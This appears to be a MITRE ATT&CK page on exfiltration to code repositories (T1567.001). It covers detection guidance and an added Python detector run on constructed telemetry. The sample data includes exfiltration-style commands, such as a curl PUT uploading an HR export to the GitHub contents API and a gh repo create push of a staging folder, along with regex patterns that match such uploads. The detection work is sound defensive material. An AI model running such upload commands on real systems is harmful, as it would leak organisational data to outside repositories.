ID | Name |
---|---|
T1567.001 | Exfiltration to Code Repository |
T1567.002 | Exfiltration to Cloud Storage |
T1567.003 | Exfiltration to Text Storage Sites |
T1567.004 | Exfiltration Over Webhook |
Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs is typically over HTTPS, which gives the adversary an additional level of protection because the uploaded content is encrypted in transit and blends with legitimate API traffic.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if the service is a popular one already used by hosts within the network, since connections to it will not stand out as a new or unusual destination.
ID | Mitigation | Description |
---|---|---|
M1021 | Restrict Web-Based Content | Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services. |
ID | Data Source | Data Component | Detects |
---|---|---|---|
DS0017 | Command | Command Execution | Monitor for execution of commands for repository interaction (git push, curl, gh repo create, git clone), use of API clients (e.g., curl -X POST https://api.github.com/repos/user/repo/contents/), or unusual usage of PowerShell or Bash scripts to automate repository uploads. Analytic 1 - Detecting Repository Uploads via Command Execution |
DS0022 | File | File Access | Monitor for access to files that are then staged and uploaded to a code repository rather than sent over the adversary's primary command and control channel. Analytic 1 - Detecting File Staging for Exfiltration to Code Repositories |
DS0029 | Network Traffic | Network Traffic Content | Monitor for outbound network connections to code repository services (e.g., github.com, gitlab.com), web API calls to repository endpoints (POST https://api.github.com/repos/...), or SSH traffic to Git services (git@github.com:username/repo.git). Analytic 1 - Detecting Outbound Connections to Code Repositories |
DS0029 | Network Traffic | Network Traffic Flow | Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for use of code repositories for data exfiltration. |
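The following is an added example, not ATT&CK's own analytic and not any vendor's detection content. It applies the Command Execution and Network Traffic Flow guidance above to constructed telemetry: it flags process command lines matching git push, gh repo create, git clone, or curl POST/PUT calls to the GitHub contents API, and flags flows to repository hosts from processes outside a network baseline or with a large outbound byte count. The host names, user names, the set of repository hosts, the baseline of network-using processes, and the 10 MB threshold are all assumptions made for the example.

```python
import re

# Code-repository hosts to watch. Assumed list for this example; extend it to
# whatever GitHub/GitLab/Bitbucket endpoints appear in your proxy logs.
REPO_HOSTS = {"github.com", "api.github.com", "uploads.github.com", "gitlab.com"}

# Command-line patterns derived from the page's Command Execution guidance
# (git push, git clone, gh repo create, curl POST/PUT to the contents API).
CMD_PATTERNS = {
    "git_push": re.compile(r"\bgit(\.exe)?\s+push\b", re.I),
    "git_clone": re.compile(r"\bgit(\.exe)?\s+clone\b", re.I),
    "gh_repo_create": re.compile(r"\bgh(\.exe)?\s+repo\s+create\b", re.I),
    "api_contents_upload": re.compile(
        r"\bcurl(\.exe)?\b.*-X\s*(POST|PUT)\b.*https://api\.github\.com/repos/[^\s]+/contents/",
        re.I | re.S),
}

# Processes that normally talk to the network on this fleet. Assumed baseline;
# in practice derive it from several weeks of flow data per host.
NETWORK_BASELINE = {"git.exe", "chrome.exe", "code.exe", "ssh.exe"}

# Constructed sample telemetry (not real logs): process-creation records and
# network-flow records in the flattened shape a SIEM might export.
PROCESS_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "code.exe",
     "cmdline": "git push origin feature/login-fix"},
    {"host": "ws02", "user": "svc-backup", "parent": "powershell.exe",
     "cmdline": 'curl.exe -X PUT -H "Authorization: token <REDACTED>" '
                'https://api.github.com/repos/user/repo/contents/hr-export.zip -d @body.json'},
    {"host": "ws03", "user": "bob", "parent": "cmd.exe",
     "cmdline": "gh repo create drop-2024 --private --source=C:\\staging --push"},
    {"host": "ws04", "user": "carol", "parent": "explorer.exe",
     "cmdline": "notepad.exe C:\\Users\\carol\\notes.txt"},
]

NETWORK_FLOWS = [
    {"host": "ws01", "process": "git.exe", "dst": "github.com", "dport": 22, "bytes_out": 150_000},
    {"host": "ws02", "process": "powershell.exe", "dst": "api.github.com", "dport": 443, "bytes_out": 48_000_000},
    {"host": "ws05", "process": "excel.exe", "dst": "github.com", "dport": 443, "bytes_out": 2_000},
    {"host": "ws06", "process": "chrome.exe", "dst": "example.org", "dport": 443, "bytes_out": 9_000_000},
]


def detect_command_execution(events):
    """Return one alert per process event whose command line matches a
    repository-upload pattern (DS0017 Command Execution)."""
    alerts = []
    for ev in events:
        for name, pat in CMD_PATTERNS.items():
            if pat.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "user": ev["user"],
                               "rule": name, "cmdline": ev["cmdline"]})
                break  # one alert per event is enough
    return alerts


def detect_network_flows(flows, baseline=NETWORK_BASELINE, large_upload=10_000_000):
    """Return alerts for flows to code-repository hosts that are unusual
    (DS0029 Network Traffic Flow): the process is not in the network baseline,
    or the outbound volume reaches large_upload bytes (assumed 10 MB)."""
    alerts = []
    for fl in flows:
        if fl["dst"] not in REPO_HOSTS:
            continue
        reasons = []
        if fl["process"] not in baseline:
            reasons.append("process not in network baseline")
        if fl["bytes_out"] >= large_upload:
            reasons.append(f"outbound volume {fl['bytes_out']} >= {large_upload}")
        if reasons:
            alerts.append({"host": fl["host"], "process": fl["process"],
                           "dst": fl["dst"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_command_execution(PROCESS_EVENTS):
        print("CMD ", a["host"], a["rule"], "::", a["cmdline"][:60])
    for a in detect_network_flows(NETWORK_FLOWS):
        print("FLOW", a["host"], a["process"], "->", a["dst"], "::", "; ".join(a["reasons"]))
```

On the constructed input the command rule fires on ws01 (git push), ws02 (curl PUT to the contents API) and ws03 (gh repo create), and the flow rule fires on ws02 (PowerShell, outside the baseline, 48 MB out) and ws05 (Excel, outside the baseline). The ws01 git.exe flow is suppressed because git is in the baseline and the volume is small, which is the trade-off the page describes: a popular service already in use gives the adversary cover, so the baseline and the volume threshold carry most of the signal.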